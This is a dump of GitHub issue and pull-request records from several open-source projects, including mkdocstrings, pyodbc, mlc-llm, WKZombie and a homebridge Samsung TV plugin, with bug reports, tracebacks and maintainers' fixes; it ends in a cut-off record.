added
stringdate
2025-04-01 04:05:38
2025-04-01 07:14:06
created
timestamp[us]date
2001-10-09 16:19:16
2025-01-01 03:51:31
id
stringlengths
4
10
metadata
dict
source
stringclasses
2 values
text
stringlengths
0
1.61M
2025-04-01T06:39:38.670083
2018-03-09T12:28:03
303825397
{ "authors": [ "jpic" ], "license": "bsd-3-clause", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8621", "repo": "mjtamlyn/django-adapters", "url": "https://github.com/mjtamlyn/django-adapters/issues/39" }
gharchive/issue
Question about the adapters pattern Considering my current understanding of the adapters pattern - waiting to stand corrected - we're going to define adapter mapping trees. Will it exclusively go in one way, ie: from django.db.models import Person # add returns a clone of the payload, so we're instanciating 2 payloads here # because the FormView adapter's post_add() will add(Form adapter, clone=False) # if it's not already there ? p = Payload.factory(instance=Person()).add('django.views.ModelFormView') # executing a step returns a clone of the payload, but we don't care: # we have an adapter mapping on data, a request, and we want a response assert p.steps.response(request=request).response The tutorial demonstrates how the above would be possible, but it might look like this (not tested code, obviously clumsy): import Person model make a payload with an empty instance, because it's a model, factory will add the django model adapter, which has post_add(): introspect the payload, map payload.instance._meta.fields to keys of the Payload corresponding to field names with the appropriate adapters for each field ie. payload.map.name.adapters == [StringAdapter(max_length=255)] add validate and clean steps add the modelformview adapter on the person payload add the form adapter on the personpayload, introspect the payload, and map keys corresponding form fields to model fields ie. payload.map.name.adapters == [StringAdapter(max_length=255), TextFieldAdapter(label="my verbose name")] add validate and clean steps on the person payload add a render step add the template adapter on the person, which adds a render step with a default template name that will be able to see other adapter's render outputs add a response step which to orchestrate other steps, but needs payload.request, and sets payload.response in a clone as usual when a step is executed unless clone=False, for calling steps from within steps execute the response step by adding request to the payload modelformview adapter response will try to execute all prior steps, if no errors are added by clean() step then process() step will save if no errors response() will if errors on validate step show the form again, otherwise redirect to the detail view, if errors were added during process who knows and honnestly i leave it up to you what the default behaviour will be since it should be so easy to override not only the method but the default adapter registered for ModelFormView !! Or, will it allow to build a nested adapter map, and then be able to generate a model class with another adapter ? class Hobby(adapters.Payload): name = Payload(adapters=[StringAdapter()]) class Person(adapters.Payload): hobbies = Payload(map=[HobbyAdapter()]) class Meta: adapters = [OnlyAllowHobbiesToBe('archery', 'django', 'music')] p = Person().add('django.db.models.Model') # custom step by django model adapter, optinal, sets payload.model if not already present p.steps.modelize().model Another possibility is to make everything an adapter, which can have adapters who know about their parent, in which case steps also are adapters, just they orchestrate the adapters which are in a mapping structure, and defining a step is just defining a method which may depend on methods priorly executed. Sorry if this doesn't make any sense please correct me ;) If that makes sense to you then you probably understand why i consider this million $ worth, in terms of refactoring, and code reusability. Closing this for now it's not supported
2025-04-01T06:39:38.678783
2020-08-13T13:01:56
678419423
{ "authors": [ "AppVeyorBot", "KvanTTT" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8622", "repo": "mkaring/ConfuserEx", "url": "https://github.com/mkaring/ConfuserEx/pull/189" }
gharchive/pull-request
Refactor duplicated code in tests, remove duplicated references from test projects Fix #158, merge after #188 :x: Build ConfuserEx 407 failed (commit https://github.com/mkaring/ConfuserEx/commit/59830d5eb4 by @KvanTTT) :x: Build ConfuserEx 409 failed (commit https://github.com/mkaring/ConfuserEx/commit/4a8592482f by @KvanTTT) :x: Build ConfuserEx 410 failed (commit https://github.com/mkaring/ConfuserEx/commit/93caef267e by @KvanTTT) :x: Build ConfuserEx 411 failed (commit https://github.com/mkaring/ConfuserEx/commit/48f4be13a2 by @KvanTTT)
2025-04-01T06:39:38.720164
2024-01-24T15:13:47
2098490953
{ "authors": [ "cldtech", "pawamoy" ], "license": "ISC", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8623", "repo": "mkdocstrings/mkdocstrings", "url": "https://github.com/mkdocstrings/mkdocstrings/issues/648" }
gharchive/issue
bug: ModuleNotFoundError: No module named 'mkdocstrings_handlers' Description of the bug When i try to build the doc i get "ModuleNotFoundError: No module named 'mkdocstrings_handlers'". This is a fresh installation and a new empty mkdocs project and i still get this error as soon as i had a class or a function. To Reproduce ``` pip3 install mkdocs pip3 install mkdocstring mkdocs new docs cd docs mkdocs build ``` Full traceback Full traceback INFO - Cleaning site directory INFO - Building documentation to directory: /home/sam/Documents/project/project/has/docs/site WARNING - A relative path to 'subfolder/functions.md' is included in the 'nav' configuration, which is not found in the documentation files. WARNING - A relative path to 'functions.md' is included in the 'nav' configuration, which is not found in the documentation files. ERROR - Error reading page 'index.md': No module named 'mkdocstrings_handlers' Traceback (most recent call last): File "/home/sam/.local/bin/mkdocs", line 8, in <module> sys.exit(cli()) File "/home/sam/.local/lib/python3.9/site-packages/click/core.py", line 1157, in __call__ return self.main(*args, **kwargs) File "/home/sam/.local/lib/python3.9/site-packages/click/core.py", line 1078, in main rv = self.invoke(ctx) File "/home/sam/.local/lib/python3.9/site-packages/click/core.py", line 1688, in invoke return _process_result(sub_ctx.command.invoke(sub_ctx)) File "/home/sam/.local/lib/python3.9/site-packages/click/core.py", line 1434, in invoke return ctx.invoke(self.callback, **ctx.params) File "/home/sam/.local/lib/python3.9/site-packages/click/core.py", line 783, in invoke return __callback(*args, **kwargs) File "/home/sam/.local/lib/python3.9/site-packages/mkdocs/__main__.py", line 286, in build_command build.build(cfg, dirty=not clean) File "/home/sam/.local/lib/python3.9/site-packages/mkdocs/commands/build.py", line 322, in build _populate_page(file.page, config, files, dirty) File "/home/sam/.local/lib/python3.9/site-packages/mkdocs/commands/build.py", line 175, in _populate_page page.render(config, files) File "/home/sam/.local/lib/python3.9/site-packages/mkdocs/structure/pages.py", line 271, in render self.content = md.convert(self.markdown) File "/home/sam/.local/lib/python3.9/site-packages/markdown/core.py", line 357, in convert root = self.parser.parseDocument(self.lines).getroot() File "/home/sam/.local/lib/python3.9/site-packages/markdown/blockparser.py", line 117, in parseDocument self.parseChunk(self.root, '\n'.join(lines)) File "/home/sam/.local/lib/python3.9/site-packages/markdown/blockparser.py", line 136, in parseChunk self.parseBlocks(parent, text.split('\n\n')) File "/home/sam/.local/lib/python3.9/site-packages/markdown/blockparser.py", line 158, in parseBlocks if processor.run(parent, blocks) is not False: File "/home/sam/.local/lib/python3.9/site-packages/mkdocstrings/extension.py", line 124, in run html, handler, data = self._process_block(identifier, block, heading_level) File "/home/sam/.local/lib/python3.9/site-packages/mkdocstrings/extension.py", line 195, in _process_block handler = self._handlers.get_handler(handler_name, handler_config) File "/home/sam/.local/lib/python3.9/site-packages/mkdocstrings/handlers/base.py", line 459, in get_handler module = importlib.import_module(f"mkdocstrings_handlers.{name}") File "/usr/lib/python3.9/importlib/__init__.py", line 127, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "<frozen importlib._bootstrap>", line 1030, in _gcd_import File "<frozen importlib._bootstrap>", line 1007, in _find_and_load File "<frozen importlib._bootstrap>", line 972, in _find_and_load_unlocked File "<frozen importlib._bootstrap>", line 228, in _call_with_frames_removed File "<frozen importlib._bootstrap>", line 1030, in _gcd_import File "<frozen importlib._bootstrap>", line 1007, in _find_and_load File "<frozen importlib._bootstrap>", line 984, in _find_and_load_unlocked ModuleNotFoundError: No module named 'mkdocstrings_handlers' Expected behavior Since i put a class in index.md, i expect the site to be generated correctly. Environment information python3 -m mkdocstrings.debug # | xclip -selection clipboard System: Linux-5.10.0-26-amd64-x86_64-with-glibc2.31 Python: cpython 3.9.2 Environment variables: PYTHONPATH: :/home/sam/Documents/Project/project Installed packages: mkdocstrings v0.24.0 Additional context Duplicate of #623, #647 You mean i have to install mkdocstrings-python with pip? Yes :)
2025-04-01T06:39:38.725417
2017-08-18T21:37:36
251364946
{ "authors": [ "kenanbalija", "mkhazov", "tunmsk" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8624", "repo": "mkhazov/videojs-share", "url": "https://github.com/mkhazov/videojs-share/issues/2" }
gharchive/issue
share buttons not working hello thank you for your great work and sharing it I installed your plugin on my website copying link and embed code work perfectly but not social buttons : I tried them all here's an url to check https://videos.arabeevideo.com/watch/p127-royal-enfield-cont is it possible to add custom embed code ? You can pass custom embed code as embedCode property in the plugin options object. Would you be kind and provide an example of share button implementation (fb or smth)? 😸 Take a look at https://neuron-digital.github.io/wjplayer/examples/mp4.html I'm not very comfortable with js programming neither with videojs , but seems like this is a customized player with many advanced featured I took a look into the source code , seems you packed plugins together , is it possible to add other plugins like playlist or context menu to your player? @tunmsk videojs has that already. He improved it with his own plugin. Check on https://github.com/videojs/video.js
2025-04-01T06:39:38.738774
2019-06-28T20:52:24
462203336
{ "authors": [ "dvarna", "gordthompson" ], "license": "MIT-0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8625", "repo": "mkleehammer/pyodbc", "url": "https://github.com/mkleehammer/pyodbc/issues/579" }
gharchive/issue
Insert result set resulting in "pyodbc.ProgrammingError: ('String data, right truncation: length 8 buffer 4', 'HY000')" error. I am using pyodbc 4.0.26 version. Inserting result-set (containing a decimal result) with "fastexecutemany" set to TRUE results in "pyodbc.ProgrammingError: ('String data, right truncation: length 8 buffer 4', 'HY000')" error. Please provide a minimum reproducible example and/or an ODBC trace, along with the name and version of the ODBC driver you are using. SQL.LOG Hi, I have attached the ODBC trace. Below are the versions of Software I am using Python Version: 3.7 pyodbc version: 4.0.26 DB: Teradata Driver: Teradata <IP_ADDRESS> OS: Win10 The previous version of the issue title indicates that you are using "fastexecutemany". Does the error go away if you use fast_executemany=False (the default)? If so, then the Teradata ODBC driver may simply not support "parameter arrays", the internal ODBC feature that allows fast_executemany=True to work. Yes. It works when fast_executemany= False. I have used fast_executemany = True on the same Teradata driver for other tables. It worked. I am having issue for this one table. could it be an issue in the data I am inserting? the data I am inserting is extracted from a VSAM file (Mainframe). The error pyodbc.ProgrammingError: ('String data, right truncation: length 8 buffer 4', 'HY000') clearly indicates that a string parameter value is overflowing the space allocated to it. Are you passing the decimal parameter values as strings? If so, can you try passing those parameter values as Decimal instead of str, e.g., Decimal('3.14') instead of '3.14'? Yes. I am passing decimal parameter values as string. I passed those values as decimal. It worked. Thanks so much for your inputs. You're welcome. Glad to hear that you got it working. You can close this issue now.
2025-04-01T06:39:38.742322
2017-06-25T22:16:21
238410570
{ "authors": [ "billylo1", "mkoehnke" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8626", "repo": "mkoehnke/WKZombie", "url": "https://github.com/mkoehnke/WKZombie/issues/65" }
gharchive/issue
open method not visible when using WKZombie in Objective C project Hi, after adding WKZombie to my podfile and adding @import WKZombie;, I can invoke some methods on the WKZombie.shareInstance, e.g. dump, setTimeoutSeconds, but the essential open method is not visible for some reasons. Would you have any hints on how to solve this? thanks. Hi @billylo1 Thanks for reporting this. You're right, there seems to be an issue with the extensions not being visible in Objective C code. I'll look into it. Thanks! Looking forward to it! Sorry for the confusion! I forgot that Swift generic functions are not supported by Objective-C. So this is the correct behaviour. However, you should be able to add a Swift file to your Objective-C project (Mix and Match) and use WKZombie in there. Hope that helps! I did try that. Importing the WKZombie-swift.h to make WKZombie visible to the objective C code. But I can't find a way to invoke "open". Are you able to make it work in Xcode? Just add a Swift file (e.g. Test.swift) to your project and simply add "import WKZombie". Create a class/function, do all the headless browsing there and hand the result back to your Objective-C code.
2025-04-01T06:39:38.753828
2024-07-24T20:01:11
2428372889
{ "authors": [ "albertodvp" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8627", "repo": "mlabs-haskell/cardanow", "url": "https://github.com/mlabs-haskell/cardanow/pull/80" }
gharchive/pull-request
Refactor cardano-db-sync code and add tests Closes #67 ~Note: this PR breaks cardanow-ts nix package: in particular the checkPhase is no longer passing: it seems the the mocking is not working as expected~ how the derivation build is not failing if tests are failing? I don't see where you disabled them and if I run nix build locally I see that some tests are executed the first draft had that, but I managed to fix that so we are currently testing things in CI, good catch probably not the end of the world since we are talking about tests anyway but is the as unknown as Mock thing unavoidable? Or perhaps it's something commonly done in Typescript? (forgive my ignorance) Not sure honestly, I'm not a TS expect neither, I'll drop a todo commit so we can look into this better later The idea is that we start docker during the tests because we need a database? I can't understand how it's mocked otherwise. Perhaps this is why the derivation check phase fails? (running docker in a derivation sandbox may be non trivial) No we are not, we are only mocking the TS code, docker is not involved
2025-04-01T06:39:38.783079
2024-01-03T14:38:43
2064147211
{ "authors": [ "CharlieFRuan", "alphaarea", "junrushao" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8628", "repo": "mlc-ai/mlc-llm", "url": "https://github.com/mlc-ai/mlc-llm/issues/1533" }
gharchive/issue
[Bug] Unable to recognize vocab.json, merges.txt tokenizer format 🐛 Bug according to #31 , mlc-llm should already support vocab.json, merges.txt tokenizer formats. But when I try to inference CausalLM/72B-preview-llamafied-qwen-llamafy I run into the error that can't find the tokenizer >>> from mlc_chat import ChatModule >>> cm = ChatModule(model="/home/alphaarea/models/CausalLM-7B-DPO-alpha-q0f16", model_lib_path="/home/alphaarea/models/CausalLM-7B-DPO-alpha-q0f16/CausalLM-7B-DPO-alpha-q0f16-cuda.so") [2024-01-03 14:04:58] INFO model_metadata.py:55: Total memory usage: 9917.13 MB (Parameters: 5462.51 MB. KVCache: 1024.00 MB. Temporary buffer: 3430.62 MB) [2024-01-03 14:04:58] INFO model_metadata.py:64: To reduce memory usage, tweak `prefill_chunk_size`, `context_window_size` and `sliding_window_size` Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/home/alphaarea/.conda/envs/mlc-llm-20240103/lib/python3.11/site-packages/mlc_chat/chat_module.py", line 774, in __init__ self._reload(self.model_lib_path, self.model_path, user_chat_config_json_str) File "/home/alphaarea/.conda/envs/mlc-llm-20240103/lib/python3.11/site-packages/mlc_chat/chat_module.py", line 988, in _reload self._reload_func(lib, model_path, app_config_json) File "tvm/_ffi/_cython/./packed_func.pxi", line 332, in tvm._ffi._cy3.core.PackedFuncBase.__call__ File "tvm/_ffi/_cython/./packed_func.pxi", line 263, in tvm._ffi._cy3.core.FuncCall File "tvm/_ffi/_cython/./packed_func.pxi", line 252, in tvm._ffi._cy3.core.FuncCall3 File "tvm/_ffi/_cython/./base.pxi", line 182, in tvm._ffi._cy3.core.CHECK_CALL File "/home/alphaarea/.conda/envs/mlc-llm-20240103/lib/python3.11/site-packages/tvm/_ffi/base.py", line 481, in raise_last_ffi_error raise py_err File "/workspace/mlc-llm/cpp/llm_chat.cc", line 1532, in mlc::llm::LLMChatModule::GetFunction(tvm::runtime::String const&, tvm::runtime::ObjectPtr<tvm::runtime::Object> const&)::{lambda(tvm::runtime::TVMArgs, tvm::runtime::TVMRetValue*)#1}::operator()(tvm::runtime::TVMArgs, tvm::runtime::TVMRetValue*) const File "/workspace/mlc-llm/cpp/llm_chat.cc", line 553, in mlc::llm::LLMChat::Reload(tvm::runtime::TVMArgValue, tvm::runtime::String, tvm::runtime::String) File "/workspace/mlc-llm/cpp/tokenizers.cc", line 63, in mlc::llm::TokenizerFromPath(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) tvm._ffi.base.TVMError: Traceback (most recent call last): 3: mlc::llm::LLMChatModule::GetFunction(tvm::runtime::String const&, tvm::runtime::ObjectPtr<tvm::runtime::Object> const&)::{lambda(tvm::runtime::TVMArgs, tvm::runtime::TVMRetValue*)#1}::operator()(tvm::runtime::TVMArgs, tvm::runtime::TVMRetValue*) const at /workspace/mlc-llm/cpp/llm_chat.cc:1532 2: mlc::llm::LLMChat::Reload(tvm::runtime::TVMArgValue, tvm::runtime::String, tvm::runtime::String) at /workspace/mlc-llm/cpp/llm_chat.cc:553 1: mlc::llm::TokenizerFromPath(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) at /workspace/mlc-llm/cpp/tokenizers.cc:63 0: _ZN3tvm7runtime6deta File "/workspace/mlc-llm/cpp/tokenizers.cc", line 63 TVMError: Cannot find any tokenizer under: /home/alphaarea/models/CausalLM-7B-DPO-alpha-q0f16 Here is the mlc-chat-config.json generated by mlc_chat gen_config, which looks like it already recognizes the tokenizer file. But it doesn't work in practice { ... "tokenizer_files": [ "vocab.json", "merges.txt", "tokenizer_config.json" ], "version": "0.1.0" } To Reproduce Several of CausalLM's models use the same tokenizer format, which can be reproduced by downloading the smallest model CausalLM/7B-DPO-alpha convert, gen_config and compile MODEL_PATH='/home/alphaarea/models/CausalLM-7B-DPO-alpha' MLC_QUANT='q0f16' MLC_DEV='cuda' MLC_SHARDS=4 MODEL_ARCH='llama' MODEL_TEMP='gpt2' MODEL_NAME=${MODEL_PATH##*/} MODEL_OUTPUT=$MODEL_PATH'-'$MLC_QUANT MODEL_LIB=$MODEL_NAME'-'$MLC_QUANT'-'$MLC_DEV'.so' mlc_chat convert_weight --quantization $MLC_QUANT --model-type $MODEL_ARCH --output $MODEL_OUTPUT $MODEL_PATH mlc_chat gen_config --quantization $MLC_QUANT --model-type $MODEL_ARCH --conv-template $MODEL_TEMP --tensor-parallel-shards $MLC_SHARDS --output $MODEL_OUTPUT $MODEL_PATH mlc_chat compile --device $MLC_DEV --output $MODEL_OUTPUT/$MODEL_LIB $MODEL_OUTPUT/mlc-chat-config.json run in python from mlc_chat import ChatModule cm = ChatModule(model="/yourpath/CausalLM-7B-DPO-alpha-q0f16", model_lib_path="/yourpath/CausalLM-7B-DPO-alpha-q0f16/CausalLM-7B-DPO-alpha-q0f16-cuda.so") Expected behavior TVMError: Cannot find any tokenizer under: /yourpath/CausalLM-7B-DPO-alpha-q0f16 Environment Platform: CUDA Operating system: Ubuntu 22.04.3 LTS Device: Tesla P100 How you installed MLC-LLM: python3 -m pip install --pre -U -f https://mlc.ai/wheels mlc-chat-nightly-cu121 mlc-ai-nightly-cu121 How you installed TVM-Unity: pip Python version: 3.11 GPU driver version: 545.23.08 CUDA/cuDNN version: 12.1 Currently we support the following tokenizers: SentencePiece HuggingFace RWKV world Byte-level BPE See the tokenizer finding logics here for more details: https://github.com/mlc-ai/mlc-llm/blob/main/cpp/tokenizers.cc. The tokenizer-related files exist (vocab.json, merges.txt and tokenizer_config.json) don't match any of the patterns in our tokenizer detection, and that's why an error is reported. Not super familiar with the tokenizer part - could you share which tokenizer it is? Please feel free to contribute if you are interested! I've figured it out, the models I've been able to run without problems in the past have the tokenizer_class LlamaTokenizer or LlamaTokenizerFast in tokenizer_config.json. But the CausalLM-72B is GPT2Tokenizer. And I had a similar problem when I trying Nous-Capybara-34B, whose tokenizer_class is YiTokenizer. Does HuggingFace tokenizers support mean only LlamaTokenizer and LlamaTokenizerFast in currently? In the future, will the common tokenizer supported by transformers.AutoTokenizer be more easily supported by mlc-llm? I do think fundamentally we support full HuggingFace tokenizers because we compile its full source in rust: https://github.com/mlc-ai/tokenizers-cpp with some wrapping logic: Rust wrapper: https://github.com/mlc-ai/tokenizers-cpp/blob/main/rust/src/lib.rs#L106-L130 Expose Rust wrapper in C++: https://github.com/mlc-ai/tokenizers-cpp/blob/main/src/huggingface_tokenizer.cc#L84 It would be awesome if you'd love to contribute adding the related wrappers to tokenizers-cpp! Ah I just noticed that GPT2Tokenizer is actually byte-level BPE tokenizer, which is supported already. We only need to figure out what the missing file add_tokens.json is used for I saw a blog explaining this file. Let me know if it's helpful! https://blog.rfox.eu/en/Programming/How_to_run_your_own_LLM_GPT.html I'll see if there's a way of generating an added_tokens.json during gen_config, just like how we currently convert tokenizer.model to tokenizer.json there. https://github.com/mlc-ai/mlc-llm/blob/main/python/mlc_chat/interface/gen_config.py#L132-L153 Meanwhile we might have to do it manually. @CharlieFRuan I tried to add an added_tokens.json with an empty json string "{}", but got another error from our tokenizer wrapper complaining about merges.txt: thread '<unnamed>' panicked at 'Invalid merges.txt file.', src/lib.rs:63:21 note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace fatal runtime error: failed to initiate panic, error 5 This line in our tokenizer wrapper tries to split each line in merges.txt into two pieces, separate by " ", which fails at the last line which only contains: å Note that the merges.txt file is different from GPT2's official one. OK I know how to make this work now! @alphaarea There are two things you will want to patch up: Add an added_tokens.json which contains an empty json object: "{}" Replace the truncated merge.txt with QWen's official one. OK I know how to make this work now! @alphaarea There are two things you will want to patch up: Add an added_tokens.json which contains an empty json object: "{}" Replace the truncated merge.txt with QWen's official one. Very thanks, I successfully run CausalLM/7B-DPO-alpha follow your way. English and Chinese both run good. And I compare the mergers.txt from CausalLM/7B-DPO-alpha and vonjack/Qwen-LLaMAfied-HFTok-7B-Chat. The front half of them is exactly the same. But the CausalLM/7B-DPO-alpha's mergers.txt is short, and looks like having a incomplete ending. The last line only has one character å. I deleted the line and try to run it, can't believe it work well. Seems no different with when use mergers.txt from vonjack/Qwen-LLaMAfied-HFTok-7B-Chat. Is this due to an error in the file provided by CausalLM itself? When I use the same way on CausalLM/72B-preview-llamafied-qwen-llamafy, it didn't have the same effect. It output broken characters, looks like the tokenizer is still having error. So I ran the test all over again, I noticed a warning appeared when starting the convert_weight [2024-01-06 11:57:23] WARNING utils.py:25: Unused extern parameters: model.layers.0.self_attn.k_proj.bias, model.layers.0.self_attn.o_proj.bias, model.layers.0.self_attn.q_proj.bias, model.layers.0.self_attn.v_proj.bias, model.layers.1.self_attn.k_proj.bias... (Incomplete, the warning is very long) Is this the reason why the model outputs broken characters? Other than that I haven't encountered any other warning messages CausalLM is not a popular model, I'm not sure if there's something wrong with the model itself. If manager determines that these errors are caused by the CauseLM's non-standard llama model itself, please close the issues.
2025-04-01T06:39:38.787753
2023-08-09T05:43:15
1842528965
{ "authors": [ "Cydia2018", "Hzfengsy", "MasterJH5574" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8629", "repo": "mlc-ai/mlc-llm", "url": "https://github.com/mlc-ai/mlc-llm/issues/710" }
gharchive/issue
[Bug] Unsupported gpu architecture 'compute_89' 🐛 Bug I got this error while building the model. Compilation error: nvcc fatal : Unsupported gpu architecture 'compute_89' I didn't encounter it before. After I commented https://github.com/mlc-ai/mlc-llm/pull/686 , the error was resolved. What's your cuda version? I guess we are trying to build sm89 while your local nvcc does not support it. We should not enable fatbin by default cc @MasterJH5574 The problem should be solved if you upgrade to CUDA 11.8. Meanwhile, we would fix it and turn off by default Thanks @Cydia2018 for reporting! With #716 we will be good to go. #716 gets merged. Please open an issue again if the issue persists :-)
2025-04-01T06:39:38.841109
2023-05-08T08:59:32
1699840927
{ "authors": [ "mmalecot", "petru-tazz" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8630", "repo": "mmalecot/file-format", "url": "https://github.com/mmalecot/file-format/issues/22" }
gharchive/issue
Detect SVG when XML declaration is missing Hello, I'm currently working on a project that relies heavily on file-format to handle images by it's media type accordingly. I've just finished implementation for SVG support in our app and, while testing, the crate failed to detect correctly that our logo is a SVG. The main reason is that it lacks the <?xml declaration, so the code never reaches this part. After looking in our (source) SVGs, I found that there are many cases: some of them contains <?xml declaration; some of them contains xmlns attribute on <svg>; The key point of this issue that, as per this doc, <?xml is optional unless the encoding is not UTF-8 or UTF-16. While I made a patch for our needs (and willing to finish up the PR), I wanted to open this issue to talk about other SVG versions and how it can be treated better for wider / more general use. Hello, Thanks for your PR! Indeed, some XML-based formats such as SVG may not be detected. After some research, it turns out that XML 1.0 has an optional declaration whereas with XML 1.1 it is mandatory. Ideally, I will have to deal with all XML-base formats when they do not have an XML declaration. I will comment directly on your PR for SVG. Hi, The patch will be available in version 0.17 later this week. Hi, I'm a bit late because I also wanted to resolve #21 for version 0.17. I'm going to do a bit of code review, the release should arrive very soon! Version 0.17.0 published including this fix! Thanks!
2025-04-01T06:39:38.867708
2020-07-29T07:01:09
667603139
{ "authors": [ "ggroel", "mmende", "simoneras" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8631", "repo": "mmende/homebridge-samsungtv-control2", "url": "https://github.com/mmende/homebridge-samsungtv-control2/issues/12" }
gharchive/issue
samsung UE40F6400 volume control hi everyone, how do i turn on volume control. thank you Volume is implemented but doesn't show up at the moment. It however shows up in the homebridge accessories tab for me. I still have to figure out why iOS isn't showing the speaker service. hi, I also see it as accessories in Homebridge but not on ios. thank you I have the theory that iOS requires some other characteristics like CurrentMediaState before it will show the volume characteristics. Unfortunately I didn't find any more documentation concerning this topic in the hombridge docs or apples homekit documentation yet. I just figured out that I can control the volume with the iPhone hardware buttons when in control center -> remote -> tv selected on top... I still don't know how to toggle mute in the remote app however. The source for this info also says that the home app just doesn't show the tv speaker accessory like other apps do. I might add an option to add a "lightbulb" accessory or so to be able to control the volume/mute directly in the home app like other plugins do. the native accessory of apple tv 4 has volume control ... maybe you can investigate on that side ... Gastón El 29 jul. 2020, a la(s) 05:20, Martin Mende<EMAIL_ADDRESS>escribió:  I just figured out that I can control the volume with the iPhone hardware buttons when in control center -> remote -> tv selected on top... I still don't know how to toggle mute in the remote app however. The source for this info also says that the home app just doesn't show the tv speaker accessory like other apps do. I might add an option to add a "lightbulb" accessory or so to be able to control the volume/mute directly in the home app like other plugins do. — You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub, or unsubscribe. Maybe it will help https://developer.apple.com/documentation/mediaplayer/mpvolumeview Gastón El 29 jul. 2020, a la(s) 05:32, Gastón Groel<EMAIL_ADDRESS>escribió: the native accessory of apple tv 4 has volume control ... maybe you can investigate on that side ... Gastón El 29 jul. 2020, a la(s) 05:20, Martin Mende<EMAIL_ADDRESS>escribió:  I just figured out that I can control the volume with the iPhone hardware buttons when in control center -> remote -> tv selected on top... I still don't know how to toggle mute in the remote app however. The source for this info also says that the home app just doesn't show the tv speaker accessory like other apps do. I might add an option to add a "lightbulb" accessory or so to be able to control the volume/mute directly in the home app like other plugins do. — You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub, or unsubscribe. in node-red Linked service "TelevisionSpeaker" e Characteristic : { "VolumeControlType":1, "VolumeSelector":true } so I see it in the control center with output {"RemoteKey":4} UP; {"RemoteKey":5} DOWN; {"RemoteKey":7}DX; {"RemoteKey":6} SX IF YOU CAN USE IT now works!!! Nice... A more fine grained volume control is not accessible in iOS yet unfortunately. However it is implemented theoretically in this plugin. I hope iOS 14 will bring volume controls for tv's.
2025-04-01T06:39:38.879336
2021-10-21T12:31:40
1032438137
{ "authors": [ "codecov-commenter", "mmiranda" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8632", "repo": "mmiranda/markdown-index", "url": "https://github.com/mmiranda/markdown-index/pull/3" }
gharchive/pull-request
Gorelease with Homebrew Adding .goreleaser.yml setup to use Homebrew Codecov Report Merging #3 (b8a35cb) into main (c383555) will not change coverage. The diff coverage is n/a. @@ Coverage Diff @@ ## main #3 +/- ## ======================================= Coverage 86.11% 86.11% ======================================= Files 1 1 Lines 108 108 ======================================= Hits 93 93 Misses 9 9 Partials 6 6 Continue to review full report at Codecov. Legend - Click here to learn more Δ = absolute <relative> (impact), ø = not affected, ? = missing data Powered by Codecov. Last update c383555...b8a35cb. Read the comment docs.
2025-04-01T06:39:38.897151
2024-02-04T06:58:39
2116916176
{ "authors": [ "fireflycons", "pugazhendhiramakrishnan08121985" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8633", "repo": "mmumshad/kubernetes-the-hard-way", "url": "https://github.com/mmumshad/kubernetes-the-hard-way/issues/330" }
gharchive/issue
Lecture Request: Seperate coure or module for Installing Kubernetes cluster Your Workstation Windows 10 Laptop, 16 GB RAM, 8 core i7 CPU What happened? Would like to see a course on Kubernetes installation on various scenarios from bare metal, cloud, virtualization, single master, multi master. Managing multiple cluster etc... Relevant log output No response Hello Please see the following: https://github.com/kodekloudhub/certified-kubernetes-administrator-course/tree/master/kubeadm-clusters https://github.com/kodekloudhub/certified-kubernetes-administrator-course/tree/master/managed-clusters/eks For general questions not directly related to this repo, please use our forum here https://community.kodekloud.com/
2025-04-01T06:39:38.898491
2020-07-01T03:26:58
648642117
{ "authors": [ "mmurray22" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8634", "repo": "mmurray22/my-portfolio", "url": "https://github.com/mmurray22/my-portfolio/pull/17" }
gharchive/pull-request
Week 3 walkthrough 4 This PR marks the completion of Step 4 of the Walkthrough for Week 3. Further commits on this branch will reflect feedback directly on this PR and feedback given on the Week 3 Step 3 PR. *Now that Week 3 Step 3's PR has been approved, I am requesting review of this PR. Sounds good! I'll do that & open a new pull request in reply
2025-04-01T06:39:38.913960
2022-04-12T14:24:33
1201931030
{ "authors": [ "agramfort", "hoechenberger", "marsipu", "ts-mindyourmind" ], "license": "BSD-3-Clause", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8635", "repo": "mne-tools/mne-qt-browser", "url": "https://github.com/mne-tools/mne-qt-browser/issues/115" }
gharchive/issue
